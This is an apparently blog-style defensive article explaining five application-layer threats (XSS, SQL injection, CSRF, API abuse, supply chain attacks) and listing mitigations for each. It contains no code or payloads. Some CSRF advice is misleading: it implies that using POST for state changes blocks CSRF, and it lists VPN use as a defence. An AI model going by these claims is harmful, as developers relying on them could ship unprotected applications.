Layer 7 Cyber Threats You Need to Know About
Date: 6 October 2024
In the world of cybersecurity, attacks can happen at different layers of your systems. As you operate in highly networked environments, it’s crucial to understand threats that target the application layer, also known as Layer 7. This is where your apps, APIs, web pages, etc. live, directly interacting with end users.
Attacks at layer 7 are on the rise, given the wealth of sensitive data accessible here. Customer information, financial transactions, user behaviours—it goes without saying that this covers some of the most important information that you protect. Yet application security often gets neglected compared to other layers like the network or infrastructure.
So what exactly are layer 7 attacks and how can you harden defences against them? Let’s dive into the top threats you face along with actionable steps so that you can ensure you, your customers, and your business are air tight.
Cross-Site Scripting (XSS)
One of your biggest risks is malicious code injection, which can occur in your web pages and applications. Through flaws in input handling, attackers can insert client-side scripts into website components viewed by users.
When you or your users later access these altered pages and apps, the malicious scripts run locally on victims’ computers or mobile devices. This allows hackers to do all sorts of things, such as stealing login/session information to compromise accounts, pulling sensitive data from databases, spreading malware payloads, defacing websites, redirecting victims, and so on.
The name for these types of script injections is XSS (cross-site scripting). The most dangerous subtype goes beyond targeting one user to compromise entire websites/apps. Watch out as XSS payloads often get in through seemingly harmless vectors like website searches, URL parameters, tracking pixels, referrer info, forms, error messages, and beyond.
How to defend?
- Input validation is paramount across all data your apps accept. You need rigorous filtering, sanitizing, and escaping on the backend before anything is rendered to users.
- Powerful WAFs (web application firewalls) will also detect XSS vectors using techniques like signature analysis, heuristics, machine learning models, threat intel feeds, and more. These proactively stop attacks mid-stream.
- Enable CSPs (content security policies) as another layer telling browsers exactly what content and origins are valid on your domains. This denies malicious payloads.
- Pen testing regularly also spots XSS flaws before criminals find them. You need robust SDLCs (software development lifecycles) that prioritize security at all app coding stages.
SQL Injection (SQLi)
Another common and dangerous attack you’ll face targets your backend databases using malicious SQL code injection. This is known as SQLi or SQL injection to steal, manipulate, or destroy critical data assets driving your operations.
The entry point is often vulnerable to website input fields, APIs, parameters, etc. They allow SQL snippets to piggyback into queries and commands that interact with your databases.
Once embedded SQL reaches your data layer, attackers can trick databases into:
- Dumping entire tables/databases into attacker's hands
- Modifying, corrupting, or deleting records
- Executing damaging commands like dropping tables or reading sensitive OS files
- Stealing/cracking admin passwords to maintain database persistence
With your database compromised, criminals can steal intellectual property, alter financial data, harvest customer PII for identity theft, hold data ransom, cause regulatory violations, and create general chaos.
How to defend?
- Any interfaces contacting databases need watertight input sanitizing and validation to block injections upstream. Never trust user-supplied data!
- Use SQL parameterization with separate parameters and literal query structures. This keeps untrusted input safely abstracted from SQL engines.
- Lockdown DB user permissions and leverage allow lists to limit location/asset access and SQL capabilities. Monitor DB logs to catch sly attackers at work.
- WAF rules can actively screen payloads, stopping known injection fingerprints and unusual queries that are dead in their tracks.
- Frequent pen testing pinpoints flaws human eyes may miss before SQLi strikes in production. Prioritize rapid patching for vulnerabilities.
Cross-Site Request Forgery (CSRF)
CSRF is another trending threat that targets authenticated users who are already active in applications and services. The goal is to essentially hijack user sessions to execute unauthorized commands, transactions, or state changes, posing as victims.
Malicious CSRF payloads typically ride phishing links/emails, site popups, clickjacking traps, widget iframes, hidden HTTP requests, and beyond. Victims access these booby-trapped vectors while already authenticated in separate web apps.
Background requests then fire to apps users are logged into, riding their cookies and tokens. Servers assume legitimacy without secondary identity checks since victims’ credentials validate requests behind the scenes. These “blind attacks” allow hackers to:
- Initiate wire transfers from bank apps
- Change user email/passwords via account settings pages
- Access restricted data through APIs
- Post embarrassing social media updates
- Trigger unwanted purchases or signups
- Spread malware via file uploads
How to defend?
CSRF seems complex but has straightforward protections:
- Use per-request unpredictable tokens to validate each transaction instead of just session cookies. Tokens foil CSRF replay attempts.
- Standardize GET for actions showing data. Use POST for state changes so CSRF can’t brute force actions via links.
- WAFs offer collective protections, such as IP reputation blocking, virtual patching of new threats, and machine learning for anomaly detection.
- Educate staff not to access work accounts from public networks without VPNs enabled. Limit the use of browsers that allow extensions/plugins.
API Abuse
APIs serve crucial functions these days, allowing flexible data exchanges between services, partners, apps, and users behind the scenes. Public-facing APIs even open capabilities for broader ecosystems. However, each endpoint is another attack point. Whether GraphQL, REST, SOAP, or proprietary APIs, these machine-readable interfaces give access to backend resources, just like a website or human login portal.
Yet APIs tend to run 24/7, accessible from anywhere, often with open standards lowering authentication barriers. Easy prey for hackers leaning on brute forcing techniques. Common API attack vectors criminals attempt:
- Mass leaked credential stuffing for account hijacking and data theft
- DDoS floods to overwhelm systems and cause outages
- Reverse engineering logic for deeper infra infiltration
- Repeated bots scanning for vulnerabilities like injection flaws
- Fuzzing attempts to find undiscovered defects
- Man-in-the-middle data manipulation
How to defend?
- Implement OAuth or tokens for API authentication, never solely passwords/API keys. Enforce device fingerprinting.
- Require per-request nonces and request rate limiting to deter brute force attacks.
- Lock down IP ranges allowed to use APIs. Check headers and payloads for signs of scripts vs humans.
- Route API traffic through WAFs proxying requests. Train ML models on typical API behaviors to detect anomalies.
- Enable meticulous API security logging for fast incident response. Scan code repos for secrets checking into public source control.
- Perform intercept testing to confirm APIs withstand real-world criminal tools/tactics.
Supply Chain Attacks
With the growth of SaaS apps and low-code platforms, you increasingly rely on an ecosystem of integrated third-party technologies. These form digital supply chains, powering operations through shared data and access. But cybercriminals realize that if any link in your supply chain falls, the effects propagate through your entire stack!
By compromising just one SaaS platform through tactics like:
- Exploiting vulnerabilities
- Stealing insider credentials
- Abusing permissions settings
- Manipulating unvalidated data flows
Attackers gain that initial foothold to traverse laterally further into your networks. This allows adversaries to steal data, trigger technology failures, or breach additional suppliers to unleash more widespread carnage. The risks spiral exponentially.
How to defend?
- Treat third parties as extensions of your own infrastructure.
- Vet supplier code integrity, security standards, and practices deeply during selection. Audit them regularly post-integration.
- Segment network access and data shares to least privilege principles.
- Use SOC2 reports on cloud services for assurance checks.
- Enable activity logging everywhere to trace anomalies in cross-system relationships.
Final Word
No environment will ever be 100% bulletproof from intrusions, but combining prudent precautions goes a long way. Make security processes a regular habit, not a rushed checklist. Promote cultural norms for cyber safety that get the entire organization invested in protection. And as new attack trends emerge, step back and review the latest guidance.